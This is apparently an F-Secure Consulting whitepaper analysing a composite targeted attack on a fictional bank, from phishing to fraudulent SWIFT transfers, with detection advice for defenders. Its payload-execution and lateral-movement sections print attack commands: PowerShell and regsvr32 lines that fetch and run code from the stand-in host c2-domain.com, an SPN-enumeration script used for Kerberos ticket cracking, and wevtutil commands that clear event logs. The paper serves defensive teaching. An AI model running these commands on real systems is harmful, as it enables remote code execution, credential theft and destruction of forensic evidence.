yet another breach - f-secure...areas of cyber security, from incident response through to securing...
TRANSCRIPT
ANOTHERBREACH
YET
Analysis of a Targeted Cyber Attack
An F-Secure Consulting Whitepaper
F-Secure Consulting is the amalgamation of four
specialist cyber security firms – MWR, nSense, Inverse
path, and Digital Assurance – combining 59 years of real-
world expertise into one global, research-led technical
consultancy.
We design solutions and provide tailored advice in all
areas of cyber security, from incident response through
to securing critical embedded systems. Like storm
chasers, our curiosity keeps us ahead of the threat as
it evolves.
ABOUT F-SECURE CONSULTING
F-Secure Countercept provides a complete managed
service for the detection of, and response to, cyber
attacks, specializing in the ability to detect and respond
to state-sponsored attacks (APT groups).
Unlike the traditional style of intrusion detection,
based on purely ‘alert driven’ monitoring, F-Secure
Countercept offers a 24/7/365 proactive threat-hunting
service built around Endpoint Detection and Response
(EDR) that utilizes security professionals with real-world
experience in attack simulation and incident response.
ABOUT F-SECURE COUNTERCEPT
Yet Another Breach
”Written in partnership with F-Secure Countercept,
this paper provides an example of a modern, targeted
attack against a large organization, and the actions of an
unsuccessful defensive team. All its contents are based
on our combined, real-world experience.
We consider how and why the many security controls
companies typically have in place fail to prevent or
detect such attacks. We also describe the security
controls and detection methodologies that would have
been effective at each stage.
THIS PAPER WILL HELP:
CISOs/CIOs
• Understand the nature of a modern targeted attack• Ask your security teams the right questions • Assess whether your organization could withstand
such an attack
Technical cyber defense staff
• Understand the tactics typically used by modern threat actors
• Gauge whether the controls you have in place are effective against them
• Discover which new controls are worth adding to your defensive setup
In-house incident response teams
• Assess whether the data sources and technologies you have in place would allow an effective investigation and response exercise in the face of such an attack
WHERE DID WE GO WRONG?“
Yet Another Breach
1
CONTENTS
2
3
4
6
7
9
10
12
13
18
20
21
22
23
24
YET ANOTHER BREACH
EXAMPLE PROCESS OF A TARGETED AT TACK SIMULATION
PERIMETER BREACH – INITIAL EXPLOITATION
F-SECURE COUNTERCEPT INSIGHTS
PAYLOAD EXECUTION
F-SECURE COUNTERCEPT INSIGHTS
MAINTAINING ACCESS
F-SECURE COUNTERCEPT INSIGHTS
INTERNAL RECONNAISSANCE AND LATERAL MOVEMENT
F-SECURE COUNTERCEPT INSIGHTS
DATA EXFILTRATION
F-SECURE COUNTERCEPT INSIGHTS
ACTIONS ON OBJECTIVES
TIMELINE OF ATTACK
CONCLUSIONS
Yet Another Breach
2
As attackers become more persistent
and defensive, threat-hunting teams
are adapting. The best are equally
as aggressive, continually securing,
monitoring, and responding to attacks
on their networks.
Though reports are frequently released
about the latest organization to fall
victim to an Advanced Persistent
Threat (APT), the reality is relatively
simple techniques are used to attack
them. The APT merely relies on a lack
of preparation in terms of prevention,
detection, and response.
The Cyber Kill Chain concept is
commonly used to illustrate an attack.
Often shown as a linear process, the
attacker makes eight steps to reach
their goal:
YET ANOTHER BREACH
Reconnaissance
The surveillance stage. Attackers assess the vulnerabilities of their target’s network estate (usually from the outside-in) to design a suitable attack plan.
Intrusion
Using the data gathered through their reconnaissance, the attacker enters their target’s systems, often making use of malware or security vulnerabilities.
Exploitation
The attacker exploits vulnerabilities and delivers malicious code onto the system to get a better foothold.
Privilege Escalation
To gain access to more data and permissions, the attacker escalates their privileges, often to an Admin.
Lateral Movement
Once in the system, the attacker can move laterally to other systems and accounts to gain more leverage, e.g. higher permissions, more critical data, and greater access.
Obfuscation/anti-forensics
The attacker lays false trails, compromises data, and clears logs to confuse and slow down any forensics team.
Denial of Service
Standard access for users and systems is disrupted to stop the attack from being monitored, tracked, or blocked.
Actions on Objectives
The extraction stage. The attacker finally executes actions to achieve their goal, from encryption for ransom, to data exfiltration or destruction.
This description of the attacker methodology
works at a high-level, but in practice, things are
rarely this linear.
Yet Another Breach
3
Acme Bank is a large financial institution with
30,000 employees and 20 offices worldwide. The
bank has a large security team of 80 staff, plus a
24/7 Security Operations Center (SOC) employing
15 individuals.
The security team use many of the security
processes and technologies common to others in
its sector. For example, the bank is both PCI- and
ISO27001-compliant. It also has: centralized patch
management solutions in place, strong password
policies, employee security, awareness training,
network IDS/IPS appliances, secure web and email
gateways, antivirus software, data-loss prevention
technologies, centralized logging using SIEM
technology, regular security testing, and a range
of intelligence feeds
Several waves of targeted phishing attacks were
launched against Acme Bank from 2016. The
attackers repeatedly compromised the bank’s
corporate workstations. In every instance
the security team was aware of, the target
workstations were removed from the network,
forensically investigated, and rebuilt.
The domains used for phishing attacks and the
command-and-control channels, were also
blocked at the organization’s web and mail
gateways.
No more aggressive activity was seen after the
initial barrage of attacks, and it was thought the
threat had been successfully repelled. However,
in late July, the attackers were able to reach the
SWIFT payment systems and transfer large sums
of money to accounts overseas. This activity
was only detected after the funds had been
transferred. And it’s now believed that most of
it was linked to a single advanced threat actor,
codenamed ‘Laser Tiger’.
This chain of events highlights significant
deficiencies in both the preventative controls and
detection capabilities deployed by Acme Bank.
EXAMPLE PROCESS OF A TARGETED ATTACK SIMULATION
TO DETECT COMPROMISES AND RESPOND EFFECTIVELY,
THREAT-HUNTERS DEVELOP A REAL-WORLD
UNDERSTANDING OF OFFENSIVE TECHNIQUES WITHIN
THE ATTACKER MINDSET – THEY BECOME RESEARCHERS,
CONTINUALLY COLLECTING AND ANALYSING DATA.
Yet Another Breach
4
Laser Tiger routinely used targeted spear-phishing
to obtain credentials and compromise user
workstations within Acme Bank. The phishing emails
contained many forms of content, ranging from
malicious links and attachments, to more complex
social engineering techniques.
One phishing campaign that focused on credential
harvesting used an employee survey targeting a few
hundred users. It copied the legitimate employee
survey page present on the Acme Bank website. The
URL for this domain (acmebank-survey.com) also
imitated the legitimate domain (acmebank.com),
tricking many users.
Two smaller, more targeted campaigns that involved
a deep level of social engineering were targeted at
the assistants of key executives in the bank.
Multiple messages were exchanged with a human
operator pretending to work for an events
management company. Their goal was to have the
user download and execute a specific payload.
The attackers demonstrated knowledge of staff
structure, roles, and employee relationships,
suggesting the collection of a significant amount
of open-source intelligence (OSINT) prior to
the attack, using sources such as LinkedIn and
Facebook. In one instance, a message closely
matched content found on a public profile
on Glassdoor.
PERIMETER BREACH INITIAL EXPLOITATION
Yet Another Breach
AWS CLOUDFLARE
5
Acme Bank had security controls in place that neither
prevented nor detected this stage of the attack. Some of
the most significant are listed below:
Threat Intelligence FeedsThis was a targeted attack using unique domains, IPs, and payloads. None of these were on any blacklists.
Uncategorized Site BlockingAcme Bank’s web proxy blocked access to newly-registered domains that hadn’t been categorized. However, the domains used in the attack had been registered some time in advance and categorized as financial news sites. In some cases, recently expired trusted domains were re-registered and used.
Security Patching The exploitation techniques didn’t require the exploitation of any vulnerabilities and therefore worked successfully on fully-patched systems. While common executable file types were blocked at both web and mail gateways, this didn’t include more esoteric executable equivalents, such as HTA files and Office documents containing macros.
Yet Another Breach
F-SECURE COUNTERCEPT
INSIGHTS
6
The attackers relied heavily on delivering link and
attachment payloads via email. From a defensive
perspective, it’s important that security teams are given
access to email data sets and the ability to perform
automated analysis at scale. While it’s not practical to
block all potentially malicious content, it is possible to
flag some for review.
Links are commonly used by attackers to direct users
to malicious external content. Automated analysis of all
links received in emails, and web proxy logs to ascertain
the content returned, can prove a useful technique for
highlighting emails that could be harmful. In this instance,
it’s uncommon for HTA files or macro-enabled Microsoft
Office documents to be received from external sources,
so these could be flagged for review.
Varying levels of email attachment analysis can also be
performed. At a basic level, collecting the names or types
of attachment can highlight suspicious payloads. A more
effective technique would be to analyze the payloads
themselves. A static analysis of all attachments to look
for embedded macros or executable content should be
complemented by a dynamic analysis to understand in
detail what each attachment does.
As more advanced attackers are likely to anticipate
dynamic analysis solutions and use tricks to defeat them,
it’s still important to use more generic indicators to triage
attachments for manual analysis.
Yet Another BreachYet Another Breach
7
PAYLOAD EXECUTIONHTA files and Microsoft Office documents with embedded
macros were the two primary techniques used to achieve
code execution on end user workstations within the
Acme Bank network. A range of phishing attacks was
launched, containing payloads that made use of legitimate
Windows functionality – such as PowerShell, regsvr32.exe,
and Windows script engines (WScript/JScript) – to load
malicious code. The initial dropper code would commonly
retrieve a remote payload and inject code directly into
memory within a legitimate Windows process.
EXAMPLE 1
One of the payloads utilizing PowerShell exploited the IEX
and WebClient functionality to download its second stage
from a remote HTTP resource using the following:
EXAMPLE 2
regsvr32.exe was used to run a second scripting stage from
an external HTTP resource:
1 powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass-nologo -noprofile -c “$u=new-object net.
webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.
CredentialCache]::DefaultCredentials;iex($u.DownloadString(‘http:// c2-domain.com/abc’))”
1 Set oShell = CreateObject (“WScript.Shell”)
2 oShell.run “regsvr32.exe /s /n /u /i:http://c2-domain.com/name.jpg scrobj.dll”
Yet Another Breach
8
Keeping the initial payload small, and loading the second
stage remotely within memory, is advantageous to
attackers. It makes forensic discovery harder, and allows
them to easily change the functionality of their payload in
future.
These techniques were successfully used against Acme
bank, bypassing a number of security controls in place:
Antivirus
No known malicious binaries were used. Instead, legitimate Windows functionality was utilized with small, dynamic, initial payloads that loaded the second stages entirely within the memory space of legitimate processes.
Application Control
Acme Bank makes use of Microsoft AppLocker to prevent general users from launching arbitrary executables and scripts from certain locations. However, Office macros are exempt from this, and HTA files can load within Internet Explorer, rendering AppLocker ineffective.
Yet Another Breach
F-SECURE COUNTERCEPT
INSIGHTS
9
Security teams need effective endpoint detection and
response software (EDR) to collect useful data, like real-
time process execution events across all endpoints. This is
an essential first step when tracking attackers. Without it,
Acme Bank’s security team was essential left blind to the
actions performed on its network. Attacker process activity
usually differs greatly from that of typical users. Laser Tiger,
for example, used many built-in Windows tools with specific
command line parameters uncommon for the average
employee.
Anomaly-detection techniques applied to these data sets,
along with additional scoring for particularly dangerous
command line options, can be used to accurately identify
suspicious uses of legitimate Windows functionality. This
includes options to load code from external sources and
anomalous parent-child relationships. For example, it would
be unusual to see Microsoft Office open a macro-enabled
document, then launch regsvr32.exe with command line
arguments for loading a script from HTTP resources.
More advanced EDR solutions could have memory analysis
capabilities that also detect evidence of code injection,
malicious DLL loading, and API hooking. This approach can
help identify other suspicious scenarios, such as the above
processes also showing evidence of reflectively loaded DLLs
and/or remotely injected threads. These are traits typical of
memory-resident malware.
We have used these methods to effectively detect file-free
malware utilizing legitimate scripting engines and code-
injection techniques.
Yet Another BreachYet Another Breach
10
Attackers commonly seek to achieve sustained access to a
network’s compromised systems over a long period of time.
Laser Tiger did so using multiple techniques to provide a
choice of routes into Acme Bank’s network. This meant if one or
two were discovered and shut down, it would still have access via
other means.
One method of maintaining persistent access was the use of
conditional Microsoft Outlook rules that, when triggered, would
download and execute a payload in-memory. This ensured their
access was resistant to system reboots and logins/logoffs, i.e.
every time the affected user started Microsoft Outlook, the
attackers regained remote control of the workstation.
The attackers also made use of more common persistence
techniques, such as registry-based Run keys and scheduled tasks.
However, they avoided any that involved writing an actual file to-
disk on the user workstations; all techniques were file-free and
loaded the malicious payload within memory from across
the network.
When the attackers later targeted servers within Acme
Bank’s environment and gained administrative-level
access, their tactics changed, and custom services were
created to deliver payloads. Service executables were
placed in legitimate locations within Program Files,
digitally signed with a certificate authority, placed on
the server, and made to blend in with existing software
to avoid detection. Timestamps for the files were also
modified to look as though they’d been present for years.
For example:
MAINTAINING ACCESS
Yet Another Breach
Service Name Java Update Service
Description Provides updates for the Java™ platform
Executable Path C:\Program Files (x86)\Java\ jre1.8.0_73\bin\ javau.exe
11
Acme Bank had a chance to detect the compromised workstations at
this stage, but the controls they had in place failed to do so.
Security Information and Event Management (SIEM)
Logging provided Acme Bank with log sources (e.g. Windows event logs) from across its network. These sometimes included key data such as the creation of new services or scheduled tasks, but missed others, such as registry Run keys and Outlook rules. With new software and updates causing log source events to occur in vast numbers every day, but with no advanced analysis functionality or anomaly-detection capabilities in place, it was easy for malicious modifications to get lost within the background noise. As a result, the data that was actually available became relevant only in retrospect.
Yet Another Breach
F-SECURE COUNTERCEPT
INSIGHTS
12
Monitoring for new persistence entries is one of the
most effective ways for teams to detect the early stages
of a compromise. Windows provides a multitude of
persistence mechanisms, such as services, scheduled
tasks, registry locations, and start-up folders.
While Acme Bank had information relating to these
mechanisms from Windows logs, it was only collected
from key servers. Thus, in a snowstorm of installs and
updates, without the correct analysis techniques in
place, the chances of identifying a malicious compromise
were poor.
An effective method of persistence detection would
be to gather as much persistence data as possible from
the entire workstation and server estate. This should be
complete with supplementary data, such as cryptographic
file hashes and digital signature information. EDR toolsets
should be capable of doing this data harvesting.
The data sets can then be aggregated to perform
frequency analysis and be automatically-enriched using
external information sources such as software libraries
and data sources like VirusTotal. This makes it far easier
to differentiate rapidly between legitimate updates and
malicious, scheduled tasks. In practice, the difference
between events like:
a. A single Google Chrome update, made to 30,000
systems, using a known-good hash, and digitally
signed by Google.
b. A small number of potentially malicious, scheduled
tasks referencing PowerShell, with options to remotely
load code from an HTTP resource.
Yet Another BreachYet Another Breach
13
INTERNAL RECONNAISSANCE AND LATERAL MOVEMENTSuccessfully breaching the perimeter
is the first step of any targeted attack
against a large organization. With access
to workstations inside the Acme Bank
network, the attackers were able to
then begin the information-gathering
phase. Their aim: to learn more about
the internal network architecture and
applications in use, with a view to extend
their access across the environment.
The initial stages of this reconnaissance
involved retrieving information about
the domain, such as users, groups,
group memberships, and key systems
and services. Instead of more traditional
techniques, like large-scale port
scanning, most information-gathering
activities were performed using in-
memory PowerShell and built-in
Windows functionality, such as DNS,
WMI, and LDAP.
The majority of network traffic in this
case simply used LDAP connections
to domain controllers. This gave the
attackers detailed knowledge of the
wider internal structure of the network,
which systems might be of interest
to them, and which users were worth
targeting in order to gain necessary
access.
Gaining more privileged access allowed
the attackers to move from their
existing compromised workstations
to other administrative workstations
and key servers. Firstly, the attackers
conducted SPN scanning via LDAP to
extract information about all services
present within the Active Directory
forest. This technique returns
information about hosts and services
running across the network, while only
requiring a single TCP connection to
LDAP on a domain controller.
1 ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory. Forest]::GetCurrentForest()).RootDomain
2 $ADForestInfoRootDomainDN = “DC=” + $ADForestInfoRootDomain -Replace(“\.”,’,DC=’)
3 $ADDomainInfoLGCDN = ‘GC://’ + $ADForestInfoRootDomainDN
4 $root = [ADSI]$ADDomainInfoLGCDN
5 $ADSPNSearcher = new-Object System.DirectoryServices. DirectorySearcher($root,”(serviceprincipalname=*)”)
6 $ADSPNSearcher.PageSize = 500
7 $AllADSQLServerSPNs = $ADSPNSearcher.FindAll()
Yet Another Breach
14
With this information to-hand, the
attackers were able to use their existing
credentials to request Kerberos service
tickets and access all the services
present across the network. Kerberos
service tickets are encrypted using a
key from the password for the service
domain account itself. This allows them
to be used to perform offline password-
cracking attacks without triggering IDS
systems or account lockout thresholds,
as would be the case for a normal
online password-guessing attack.
Insufficiently complex passwords can
then be cracked, with privileged service
account passwords often allowing a
much greater level of access across
the network.
Evidence of unusually large numbers
of Kerberos service ticket requests was
seen in logs from Windows domain
controllers for specific users that
were later determined to have been
victims of the initial spear-phishing
attacks. It’s believed the attackers were
able to crack some of these Kerberos
service tickets so they could obtain the
password for domain service accounts.
Unfortunately for Acme Bank, this
was only discovered during forensic
investigation post-breach.
Domain Auth
Kerberos Ticket Granting Ticket (TGT)
TGS
Access Granted
What is the SPN for Exchange?
Exchange SPN
TGT & SPN
Ticket Granting Service (TGS) Ticket
Yet Another Breach
15
Little forensic evidence of actual lateral movement was found
after the attack. While Windows logs for domain controllers
and key production servers were being collected using Acme
Bank’s SIEM, logs from the wider network of workstations and
development and test environments weren’t collected. Suspicious
activity within the domain controller logs was identified for one
particular service account and one admin user who worked on the
SWIFT environment. Subsequent manual forensic investigation
of the staging server where the service account was in use, and
of the admin user’s personal workstation, revealed some lateral
movement techniques used.
Using the following commands, Windows event logs were seen
being cleared by the attackers, removing evidence of their activity.
However, traces of the relevant logs were successfully recovered
from volume shadow copies on the system.
Remote access to the systems was gained using both network
logins (type 3) over TCP/445 to spawn new processes, and RDP
access (type 8) via TCP/3389 in the case of the staging server.
The service account was identified as having a weak password, so
it’s assumed this was compromised from the SPN scanning and
Kerberos service ticket cracking.
2 wevtutil.exe cl “Application”
3 wevtutil.exe cl “Security”
4 wevtutil.exe cl “System”
1 Wevtutil.exe cl “Microsoft-Windows-TerminalServices-LocalSessionManager/
Operational” wevtutil.exe cl “Microsoft-Windows-TerminalServices-
RemoteConnectionManager/Operational” wevtutil.exe cl “Microsoft-Windows-
RemoteDesktopServices-RdpCoreTS/Operational” wevtutil.exe cl “Microsoft-
Windows-RemoteDesktopServices-SessionServices/Operational”
Yet Another Breach
16
Remote access to the systems was gained using both network
logins (type 3) over TCP/445 to spawn new processes, and RDP
access (type 8) via TCP/3389 in the case of the staging server.
The service account was identified as having a weak password, so
it’s assumed this was compromised from the SPN scanning and
Kerberos service ticket cracking.
Another domain account present on this system had workstation
admin rights and, from the timeline of events, it appeared this was
used to specifically target the SWIFT admin user’s workstation and
harvest their privileged credentials from memory. Consequently,
it’s believed the workstation admin account was harvested from
the compromised staging server, allowing the attackers
to directly target the administrative users responsible for the
SWIFT environment.
Shortly after these events, wide-ranging access using the admin’s
account was observed within the SWIFT production environment
from the IP address of one of the original compromised
workstations and far in excess of the usual access patterns.
Yet Another Breach
RDP
SMB
Mimikatz
17
Numerous security controls in Acme Bank’s environment failed
at this stage of the attack, but some of the key controls are
outlined below:
Password PolicyWhile a strong password policy was in place for new user accounts, the affected service account was years old without a set password expiry. Offline password cracking is effective against all but the strongest passwords, so the lack of regular password-cracking exercises within Acme Bank let this account go unnoticed and allowed the attackers to compromise it.
SIEM User Account MonitoringAcme Bank’s SIEM consumed all Windows domain controller logs and critical production server logs but not logs from the wider infrastructure. This meant it was blind to attacks targeting development and test environments, as well as the entire workstation estate. Additionally, all views and alerting were focused on account brute-forcing and creation of new user accounts or modification of existing group memberships. However, Kerberos service ticket-specific monitoring wasn’t performed, meaning the sudden request for thousands of Kerberos service tickets by a single employee user account went unnoticed.
Network IDSIDS appliances were placed at strategic locations to monitor network traffic for signs of attack, with events reported to the centralized SIEM. These were highly tuned to identify large-scale network port scanning and similar network enumeration techniques. However, they couldn’t identify modern enumeration techniques that utilize LDAP queries using a single connection to a small number of domain controllers. The number of alerts generated by the IDS was also extremely high and false-positive prone, so any relevant events were likely to be swallowed by a sea of noise.
Host-Based FirewallsWindows Firewall was in use across the Microsoft domain estate with a domain profile set. While this had a default-deny rule for inbound connections, many of the default rules in place allowed access to key Windows ports such as TCP 135/139/445 for file and printer sharing. All servers also had a domain policy set via GPO to have remote desktop enabled. This crippled the protection of the host-based firewall and enabled the attackers to gain remote administrative access to most workstations and servers with ease, once they had valid credentials.
Yet Another Breach
F-SECURE COUNTERCEPT
INSIGHTS
18
Acme Bank was reliant on traditional security products:
such as antivirus to detect payloads, and IDS to detect
network scanning. The attackers bypassed these controls
and neither product provided any security value.
Additionally, their account-monitoring activity only
covered key production servers and domain controllers
and wasn’t monitoring for Kerberos-specific attacks.
Once an attacker has a foothold in a network and access
to legitimate user credentials, detection can become
significantly more difficult as the attacker will often use
purely legitimate tools from then on. Two of the most
appropriate techniques at this point would have been:
a. Slowing the ability of the attacker to move around the
network
b. Anomalous behavior-detection techniques,
identifying user accounts or systems operating
outside normal usage patterns
At the simplest level, good restriction of management
functionality using host-based firewalls can reduce an
attacker’s network mobility. Obtaining valid credentials
is one thing, but without access to management ports on
most of the network (such as RPC, SMB, RDP, WinRM, SSH,
and so on), it becomes very hard to make effective use of
these credentials.
Yet Another BreachYet Another Breach
19
Common group policy controls can effectively
prevent remote use of privileged credentials.
For example, many accounts that require
administrative access on a system might only
require that access locally, due to being service
accounts or desktop support accounts that
enable employees with physical access to
particular systems. Use of the ‘Deny access
to this computer from the network’ group
policy option and other similar controls can be
effective in limiting the impact of compromise
for certain groups of privileged user accounts.
The ‘Restrict NTLM’ group of options can also
hinder the use of pass-the-hash attacks for
remote access.
For anomalous behavior detection, the basic
idea is to use rolling time windows to build
profiles of common activity. It should identify
the systems from which each user account
normally operates interactively, and which
systems are normally accessed over the
network. Common profiles for the amount of
data sent outbound to internet addresses or
downloaded from internal resources can also
be created.
A standard employee will generally operate
their user account at a single workstation
and access a common set of services across
the network. If that account requests 2,000
Kerberos tickets while the LDAP traffic for
the user’s workstation spikes significantly,
this falls outside the norm and should be
flagged. Likewise, a service account that
normally operates interactively on a common
set of servers is then seen operating from
a workstation and accessing systems using
network logins, has deviated from its profile.
Effective application of these techniques
without overwhelming security teams
with false positives requires careful use of
machine-learning techniques. The idea is to
build accurate models of predictable users
and systems, while ruling out the minority of
unpredictable ones. Some simple first steps
can be applied to cover common scenarios
using more traditional approaches. Reviewing
accounts requesting high numbers of Kerberos
service tickets per day, and adding exceptions
for noisy accounts, could easily spot SPN
scanning. Likewise, LDAP traffic from the bulk
of the network should have relatively tight
parameters of data-flow quantity, so a daily
review of systems seen making heavy use of
LDAP could spot network enumeration.
Yet Another BreachYet Another Breach
20
Laser Tiger used many different IPs and domains throughout its
campaign for both phishing sites and command-and-control
channels. A number of techniques was used to disguise the sites,
including:
• Reusing recently-expired domains that already had good reputations
• Ensuring sites were correctly categorized by web filters as benign
• Using legitimate content within sites
• Impersonating Acme Bank domains
• Using content distribution networks (CDNs) to proxy traffic
The infrastructure used was also changed regularly with no IP/
domain reused between campaigns. Acme Bank often focused
on blocking individual IPs/domains, and failed to anticipate
the attackers changing infrastructure to evade these controls.
The payloads on both workstations and servers were seen
communicating with the C2 infrastructure over HTTP, using
encrypted payloads.
At various points during the attack, there would have been
relatively significant quantities of network traffic - large-scale
mining of LDAP for information and SPN scanning would require
unusually high levels of LDAP traffic between compromised
workstations and domain controllers. Meanwhile, interactive RDP
sessions over long periods, and the theft of large data sets along
the way, would have resulted in far more internet-bound upload
traffic than usual from the compromised systems. However, Acme
Bank didn’t have good net-flow data feeding into its SIEM , or
analysis techniques that would have been able to spot deviations
from normal traffic patterns.
DATA EXFILTRATION
Yet Another Breach
F-SECURE COUNTERCEPT
INSIGHTS
21
Monitoring for anomalous traffic flows can be particularly
challenging when facing an advanced attacker. Traditional
approaches, such as using technical threat intelligence
involving ‘known-bad’ domains and IP addresses, are
ineffective as the attackers will simply use new infrastructure
that has no history of malicious activity. Reputation-based
analysis is a step forward but ineffective when the attackers
use positive reputation addresses, as in this case and likely in
any targeted attack conducted by a skilled group.
Domain history could have provided some interesting
findings, as the creation date of some of the phishing
domains was maybe just weeks or months old. Analysis
of DNS data for domains containing the word ‘Acme’, or
unfamiliar domains similar to real domains, would also have
highlighted those used by Laser Tiger. Careful analysis of
dates, registrars, and others associated with the domains
seen in use for the originally reported phishing emails and
implant payloads might also have provided leads. These
could be correlated against all information on all domains
with Acme Bank’s logs to help construct a shortlist of other
potentially malicious domains.
Detection of anomalous data flows relating to key services
and outbound traffic was discussed previously, but there are
other techniques that can be applied specifically to identify
communications channels. Similar learning models can be
applied to the standard user agents used by each system.
This will help identify new user agents that are potentially
related to an implant, while statistical techniques can identify
long-running, regular communication with outside domains
that are indicative of ‘beaconing’ behavior. These techniques
are false-positive prone when used in isolation. However,
when combined with anomaly-detection techniques, and
enriched with information on domains (such as global
popularity), they can yield strong defensive results. A smaller
number of systems that start beaconing to a previously
unseen domain can be differentiated from a popular Google
domain related to Google Chat that has been seen on the
network for many years.
Yet Another BreachYet Another Breach
22
Once Laser Tiger compromised a SWIFT administrator’s
workstation and privileged user account, it had unrestricted
access to the SWIFT environment. The earliest timestamps
indicate the attackers had access to the payment systems from
early July, when they presumably began gathering information
on the payment process. They are suspected of injecting
transfer information within the payment files that were held on
an FTP server, before being retrieved by the SWIFT application.
Unscheduled server restarts of critical systems were seen shortly
after the unusual SWIFT transfers took place. The attackers are
thought to have performed these restarts to remove forensic
artefacts from memory.
One day prior to the actual fraudulent SWIFT transactions, a
Distributed Denial of Service (DDoS) attack was launched against
Acme Bank’s main corporate website, taking it offline for eight
hours. The attack lasted for around 24 hours, making it a key
focus for the bank’s security team. Though no link can be proved,
the timing of the attack – just before the SWIFT transfers – and
the fact that no group claimed responsibility for the DDoS or
demanded ransom suggests it was a diversionary tactic by Laser
Tiger. Only on discovering the fraudulent transactions did Acme
Bank become aware of the full extent of the compromise and
launch a dedicated incident response process.
ACTIONS ON OBJECTIVES
Yet Another Breach
23
TIMELINE OF ATTACK
05/01/16
06/01/16
07/01/16
09/01/16
17/02/16
18/02/16
08/04/16
11/04/16
10/05/16
13/05/16
22/07/16
23/07/16
25/07/16
First phishing attacks launched with a
Microsoft Office macro payload
User reports suspicious email to security
team. Security team confirms email is
malicious and begins investigation
Command-and-control channel is
confirmed and blocked at the web proxy
Workstations are replaced and passwords
reset for all users who were confirmed to
have received the same email
Large-scale phishing campaign focused on
credentials theft using ‘acme-survey.com’
User reports suspicious email and
credentials are reset for users who
accessed the site
Phishing emails referencing a fake support
site dropping an HTA payload are delivered
Phishing campaign targets a smaller
number of users with a different HTA
payload
First use of compromised domain service
account
SWIFT admin user account used
to illegitimately access the SWIFT
environment
Distributed Denial of Service takes down
Acme Bank website for 8 hours
SWIFT transfers are made to overseas
accounts
Bank discovers fraudulent transaction and
begins incident response
Yet Another Breach
24
CONCLUSIONS
KEY TAKEAWAYS:
STEPS TOWARDS SECURITY:
This compromise is an example of how
today’s cyber attackers continually perform
reconnaissance and escalation of access over a
period of months or longer to achieve their goals.
Prevention and detection tactics can slow the
attacker, but whether they come to a standstill
depends on the skill and persistence of the
attacking and defending teams.
The Laser Tiger group demonstrated a very
high level of operational security in using in-
memory techniques and custom payloads,
relying on legitimate Windows functionality,
targeting specific users, and maintaining/
changing a comprehensive set of C2 channels.
The Acme Bank security team was unprepared
to handle such an adversary and, as a result, the
organization suffered a significant financial loss.
• Defense informs offense, offense informs defense. Understanding the techniques used by the threat allows you to prevent and detect more effectively
• Both prevention and detection should be used to slow a determined attacker
• Your network needs to be continually defended, requiring a skilled team of threat hunters
• Real-time, continuous monitoring of endpoints is essential – workstations are the front line, and the most common entry point into your network.
• Conduct a static analysis of all email attachments
• Use more generic indicators to triage attachments for manual analysis
• Ensure your EDR toolsets can gather as much persistence data as possible
• Response times matter. Although real-time detection is unlikely, spotting an attacker in the first hours or days of an attack is a huge win, especially considering compromises can last weeks, months, or even years
• Many traditional security controls aren’t capable of preventing or detecting modern offensive techniques used in targeted attacks. Modern approaches are needed, and targeted attack simulation exercises are the only way to truly test your defenses
• Review accounts requesting high numbers of Kerberos tickets
• Regularly carry out targeted attack simulation exercises
Yet Another Breach